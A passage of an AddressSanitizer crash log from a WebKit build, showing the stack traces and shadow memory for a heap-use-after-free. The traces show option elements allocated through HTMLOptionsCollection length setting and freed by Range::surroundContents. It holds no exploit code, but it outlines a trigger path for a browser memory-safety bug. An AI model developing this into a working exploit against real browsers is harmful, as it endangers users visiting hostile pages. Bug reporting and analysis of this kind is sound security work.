(/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b54c12)<br /> #88 0x14f3c84e8 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WebCore::EventTarget::EventInvokePhase)+0x148 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b544e8)<br /> #89 0x150297b84 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*)+0x384 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4a23b84)<br /> #90 0x1502ad77f in WebCore::DOMWindow::dispatchLoadEvent()+0x26f (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4a3977f)<br /> #91 0x14f28a805 in WebCore::Document::dispatchWindowLoadEvent()+0x55 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3a16805)<br /> #92 0x14f28a110 in WebCore::Document::implicitClose()+0x360 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3a16110)<br /> #93 0x1500ba488 in WebCore::FrameLoader::checkCallImplicitClose()+0xd8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4846488)<br /> #94 0x1500b9a62 in WebCore::FrameLoader::checkCompleted()+0x2b2 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4845a62)<br /> #95 0x1500b5db8 in WebCore::FrameLoader::finishedParsing()+0x1b8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4841db8)<br /> #96 0x14f2ad85e in WebCore::Document::finishedParsing()+0x2fe (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3a3985e)<br /> #97 0x14fb13df4 in WebCore::HTMLConstructionSite::finishedParsing()+0x24 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x429fdf4)<br /> #98 0x14fb7cdcd in WebCore::HTMLTreeBuilder::finished()+0x1d (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4308dcd)<br /> #99 0x14fb1c697 in WebCore::HTMLDocumentParser::end()+0x17 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42a8697)<br /> #100 0x14fb1a358 in WebCore::HTMLDocumentParser::attemptToRunDeferredScriptsAndEnd()+0x38 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42a6358)<br /> #101 0x14fb1a270 in WebCore::HTMLDocumentParser::prepareToStopParsing()+0x110 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42a6270)<br /> #102 0x14fb1c6df in WebCore::HTMLDocumentParser::attemptToEnd()+0x3f (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42a86df)<br /> #103 0x14fb1c779 in WebCore::HTMLDocumentParser::finish()+0x29 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42a8779)<br /> #104 0x15003e8a0 in WebCore::DocumentWriter::end()+0x1a0 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x47ca8a0)<br /> #105 0x15003d146 in WebCore::DocumentLoader::finishedLoading()+0x306 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x47c9146)<br /> #106 0x15003c980 in WebCore::DocumentLoader::notifyFinished(WebCore::CachedResource&, WebCore::NetworkLoadMetrics const&)+0x450 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x47c8980)<br /> #107 0x150200d1f in WebCore::CachedResource::checkNotify(WebCore::NetworkLoadMetrics const&)+0x17f (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x498cd1f)<br /> #108 0x1501ee6be in WebCore::CachedResource::finishLoading(WebCore::FragmentedSharedBuffer const*, WebCore::NetworkLoadMetrics const&)+0x4e (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x497a6be)<br /> #109 0x1501fd617 in WebCore::CachedRawResource::finishLoading(WebCore::FragmentedSharedBuffer const*, WebCore::NetworkLoadMetrics const&)+0x267 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4989617)<br /> #110 0x150177daa in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&)+0x65a (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4903daa)<br /> #111 0x12140ca42 in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics&&)+0x2b2 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x272fa42)<br /> #112 0x121dddfb7 in void IPC::callMemberFunctionImpl<WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics&&), std::__1::tuple<WebCore::NetworkLoadMetrics>, 0ul>(WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics&&), std::__1::tuple<WebCore::NetworkLoadMetrics>&&, std::__1::integer_sequence<unsigned long, 0ul>)+0x47 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3100fb7)<br /> #113 0x121dddef7 in void IPC::callMemberFunction<WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics&&), std::__1::tuple<WebCore::NetworkLoadMetrics>, std::__1::integer_sequence<unsigned long, 0ul> >(std::__1::tuple<WebCore::NetworkLoadMetrics>&&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics&&))+0x17 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3100ef7)<br /> #114 0x121dd3752 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics&&)>(IPC::Connection&, IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics&&))+0x152 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x30f6752)<br /> #115 0x121dd2a99 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&)+0x1f9 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x30f5a99)<br /> #116 0x1213f640e in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&)+0x10e (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x271940e)<br /> #117 0x121f46f2c in IPC::Connection::dispatchMessage(IPC::Decoder&)+0x25c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3269f2c)<br /> #118 0x121f477e4 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >)+0x2e4 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x326a7e4)<br /> #119 0x121f48334 in IPC::Connection::dispatchOneIncomingMessage()+0x184 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x326b334)<br /> #120 0x121f61a05 in IPC::Connection::enqueueIncomingMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >)::$_16::operator()()+0x35 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3284a05)<br /> #121 0x121f6196c in WTF::Detail::CallableWrapper<IPC::Connection::enqueueIncomingMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >)::$_16, void>::call()+0xc (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x328496c)<br /> #122 0x13aef25ae in WTF::Function<void ()>::operator()() const+0x3e (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x3e5ae)<br /> #123 0x13afb51c8 in WTF::RunLoop::performWork()+0x238 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1011c8)<br /> #124 0x13afb838a in WTF::RunLoop::performWork(void*)+0xba (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10438a)<br /> #125 0x7ff812c1a1aa in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__+0x10 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x801aa)<br /> #126 0x7ff812c1a112 in __CFRunLoopDoSource0+0xb3 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x80112)<br /> #127 0x7ff812c19e8c in __CFRunLoopDoSources0+0xf1 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x7fe8c)<br /> #128 0x7ff812c188a7 in __CFRunLoopRun+0x37b (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x7e8a7)<br /> #129 0x7ff812c17e6b in CFRunLoopRunSpecific+0x231 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x7de6b)<br /> #130 0x7ff813a75d09 in -[NSRunLoop(NSRunLoop) runMode:beforeDate:]+0xd7 (/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation:x86_64+0x5fd09)<br /> #131 0x7ff813b00786 in -[NSRunLoop(NSRunLoop) run]+0x4b (/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation:x86_64+0xea786)<br /> #132 0x7ff81289b815 in _xpc_objc_main+0x304 (/usr/lib/system/libxpc.dylib:x86_64+0x15815)<br /> #133 0x7ff81289b238 in xpc_main+0x62 (/usr/lib/system/libxpc.dylib:x86_64+0x15238)<br /> #134 0x11fb28457 in WebKit::XPCServiceMain(int, char const**)+0x437 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe4b457)<br /> #135 0x121f11038 in WKXPCServiceMain+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3234038)<br /> #136 0x106e51e98 in main+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x100003e98)<br /> #137 0x10c96152d (/usr/lib/dyld:x86_64+0x552d)<br /><br />0x60c000091ae0 is located 96 bytes inside of 120-byte region [0x60c000091a80,0x60c000091af8)<br />freed by thread T0 here:<br /> #0 0x1072b00f6 in __sanitizer_mz_free+0x86 (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/12.0.5/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x490f6)<br /> #1 0x13b1401f4 in bmalloc::DebugHeap::free(void*)+0x24 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x28c1f4)<br /> #2 0x13b140b23 in pas_debug_heap_free+0x33 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x28cb23)<br /> #3 0x13b1399c1 in bmalloc_heap_config_specialized_try_deallocate_not_small_exclusive_segregated+0x881 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2859c1)<br /> #4 0x13b1490c8 in bmalloc::api::isoDeallocate(void*)+0x3d8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2950c8)<br /> #5 0x14f910afb in bmalloc::api::IsoHeap<WebCore::HTMLOptionElement>::deallocate(void*)+0xb (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x409cafb)<br /> #6 0x14f910ae2 in WebCore::HTMLOptionElement::operator delete(void*)+0x12 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x409cae2)<br /> #7 0x14f915025 in WebCore::HTMLOptionElement::~HTMLOptionElement()+0x15 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x40a1025)<br /> #8 0x14f44c8b3 in WebCore::Node::removedLastRef()+0x73 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd88b3)<br /> #9 0x14f2205b7 in WebCore::ContainerNode::removeChildren()+0x397 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39ac5b7)<br /> #10 0x14f21f6e0 in WebCore::ContainerNode::replaceAll(WebCore::Node*)+0x2f0 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39ab6e0)<br /> #11 0x14f48a44b in WebCore::Range::surroundContents(WebCore::Node&)+0x48b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c1644b)<br /> #12 0x14d00f454 in WebCore::jsRangePrototypeFunction_surroundContentsBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSRange*)::'lambda'()::operator()() const+0x54 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x179b454)<br /> #13 0x14d00f0e2 in JSC::JSValue WebCore::toJS<WebCore::IDLUndefined, WebCore::jsRangePrototypeFunction_surroundContentsBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSRange*)::'lambda'()>(JSC::JSGlobalObject&, JSC::ThrowScope&, WebCore::jsRangePrototypeFunction_surroundContentsBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSRange*)::'lambda'()&&)+0xe2 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x179b0e2)<br /> #14 0x14d00ed71 in WebCore::jsRangePrototypeFunction_surroundContentsBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSRange*)+0x2f1 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x179ad71)<br /> #15 0x14d00e9f1 in long long WebCore::IDLOperation<WebCore::JSRange>::call<&(WebCore::jsRangePrototypeFunction_surroundContentsBody(JSC::JSGlobalObject*, JSC::CallFrame*, WebCore::JSRange*)), (WebCore::CastedThisErrorBehavior)0>(JSC::JSGlobalObject&, JSC::CallFrame&, char const*)+0x101 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x179a9f1)<br /> #16 0x14d006218 in WebCore::jsRangePrototypeFunction_surroundContents(JSC::JSGlobalObject*, JSC::CallFrame*)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1792218)<br /> #17 0x2d205540c037 (<unknown module>)<br /> #18 0x13be52ead in llint_entry+0x1d17b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf9eead)<br /> #19 0x13be35b28 in vmEntryToJavaScript+0xd7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf81b28)<br /> #20 0x13d8a7a74 in JSC::Interpreter::executeCall(JSC::JSGlobalObject*, JSC::JSObject*, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x654 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x29f3a74)<br /> #21 0x13e2839b9 in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x49 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cf9b9)<br /> #22 0x13e283aaf in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0xdf (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfaaf)<br /> #23 0x13e283e6b in JSC::profiledCall(JSC::JSGlobalObject*, JSC::ProfilingReason, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0x10b (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfe6b)<br /> #24 0x14e953c5f in WebCore::JSExecState::profiledCall(JSC::JSGlobalObject*, JSC::ProfilingReason, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0x10f (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30dfc5f)<br /> #25 0x14e9846d5 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&)+0xb05 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x31106d5)<br /> #26 0x14f3c8c12 in WebCore::EventTarget::innerInvokeEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::RawPtrTraits<WebCore::RegisteredEventListener>, WTF::DefaultRefDerefTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 2ul, WTF::FastMalloc>, WebCore::EventTarget::EventInvokePhase)+0x522 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b54c12)<br /> #27 0x14f3c84e8 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WebCore::EventTarget::EventInvokePhase)+0x148 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b544e8)<br /> #28 0x14f3932f9 in WebCore::EventContext::handleLocalEvents(WebCore::Event&, WebCore::EventTarget::EventInvokePhase) const+0x429 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b1f2f9)<br /> #29 0x14f3bbf5c in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&)+0x11c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b47f5c)<br /><br />previously allocated by thread T0 here:<br /> #0 0x1072afcf0 in __sanitizer_mz_malloc+0xa0 (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/12.0.5/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x48cf0)<br /> #1 0x7ff81298aaba in _malloc_zone_malloc+0x7c (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x1daba)<br /> #2 0x13b140108 in bmalloc::DebugHeap::malloc(unsigned long, bmalloc::FailureAction)+0x28 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x28c108)<br /> #3 0x13b140a38 in pas_debug_heap_malloc+0x38 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x28ca38)<br /> #4 0x13b13ec31 in pas_debug_heap_allocate+0x21 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x28ac31)<br /> #5 0x13b138d89 in bmalloc_heap_config_specialized_try_allocate_common_impl_slow+0x549 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x284d89)<br /> #6 0x13b108bc9 in bmalloc_iso_allocate_impl_impl_slow+0x29 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x254bc9)<br /> #7 0x13b0d55fc in bmalloc_iso_allocate_impl_casual_case+0x22c (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2215fc)<br /> #8 0x13b0d53c8 in bmalloc_iso_allocate_casual+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2213c8)<br /> #9 0x13b148610 in bmalloc::api::isoAllocate(__pas_heap_ref&)+0x1a0 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x294610)<br /> #10 0x14f910ac0 in bmalloc::api::IsoHeap<WebCore::HTMLOptionElement>::allocate()+0x10 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x409cac0)<br /> #11 0x14f910aa5 in WebCore::HTMLOptionElement::operator new(unsigned long)+0x15 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x409caa5)<br /> #12 0x14f910bf9 in WebCore::HTMLOptionElement::create(WebCore::Document&)+0x19 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x409cbf9)<br /> #13 0x14f92b5ae in WebCore::HTMLSelectElement::setLength(unsigned int)+0x41e (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x40b75ae)<br /> #14 0x14f9141b2 in WebCore::HTMLOptionsCollection::setLength(unsigned int)+0x22 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x40a01b2)<br /> #15 0x14c9fce34 in WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)::'lambda'()::operator()() const+0x54 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1188e34)<br /> #16 0x14c9fccf6 in void WebCore::invokeFunctorPropagatingExceptionIfNecessary<WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)::'lambda'()>(JSC::JSGlobalObject&, JSC::ThrowScope&, WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)::'lambda'()&&)+0xd6 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1188cf6)<br /> #17 0x14c9fca52 in WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)+0x292 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1188a52)<br /> #18 0x14c8fdb43 in bool WebCore::IDLAttribute<WebCore::JSHTMLOptionsCollection>::set<&(WebCore::setJSHTMLOptionsCollection_lengthSetter(JSC::JSGlobalObject&, WebCore::JSHTMLOptionsCollection&, JSC::JSValue)), (WebCore::CastedThisErrorBehavior)0>(JSC::JSGlobalObject&, long long, long long, JSC::PropertyName)+0x113 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1089b43)<br /> #19 0x14c8fda28 in WebCore::setJSHTMLOptionsCollection_length(JSC::JSGlobalObject*, long long, long long, JSC::PropertyName)+0x8 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1089a28)<br /> #20 0x13e4f5eb9 in WTF::FunctionPtr<(WTF::PtrTag)30177, bool (JSC::JSGlobalObject*, long long, long long, JSC::PropertyName), (WTF::FunctionAttributes)1>::operator()(JSC::JSGlobalObject*, long long, long long, JSC::PropertyName) const+0x29 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x3641eb9)<br /> #21 0x13e636ad4 in JSC::JSObject::putInlineSlow(JSC::JSGlobalObject*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&)+0xb14 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x3782ad4)<br /> #22 0x13e60f947 in JSC::JSObject::put(JSC::JSCell*, JSC::JSGlobalObject*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&)+0x8b7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x375b947)<br /> #23 0x14c8efc49 in WebCore::JSHTMLOptionsCollection::put(JSC::JSCell*, JSC::JSGlobalObject*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&)+0x689 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x107bc49)<br /> #24 0x13de96858 in llint_slow_path_put_by_id+0x2008 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2fe2858)<br /> #25 0x13be40b5c in llint_entry+0xae2a (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf8cb5c)<br /> #26 0x13be35b28 in vmEntryToJavaScript+0xd7 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xf81b28)<br /> #27 0x13d8a7a74 in JSC::Interpreter::executeCall(JSC::JSGlobalObject*, JSC::JSObject*, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x654 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x29f3a74)<br /> #28 0x13e2839b9 in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&)+0x49 (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cf9b9)<br /> #29 0x13e283aaf in JSC::call(JSC::JSGlobalObject*, JSC::JSValue, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&)+0xdf (/Users/hacksonmacs/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x33cfaaf)<br /><br />SUMMARY: AddressSanitizer: heap-use-after-free (/Users/hacksonmacs/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2449ea) in WebCore::QualifiedName::localName() const+0x2a<br />Shadow bytes around the buggy address:<br /> 0x1c1800012300: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd<br /> 0x1c1800012310: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa<br /> 0x1c1800012320: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd<br /> 0x1c1800012330: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd<br /> 0x1c1800012340: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa<br />=>0x1c1800012350: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fa<br /> 0x1c1800012360: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00<br /> 0x1c1800012370: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa<br /> 0x1c1800012380: 00 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc<br /> 0x1c1800012390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x1c18000123a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br />Shadow byte legend (one shadow byte represents 8 application bytes):<br /> Addressable: 00<br /> Partially addressable: 01 02 03 04 05 06 07 <br /> Heap left redzone: fa<br /> Freed heap region: fd<br /> Stack left redzone: f1<br /> Stack mid redzone: f2<br /> Stack right redzone: f3<br /> Stack after return: 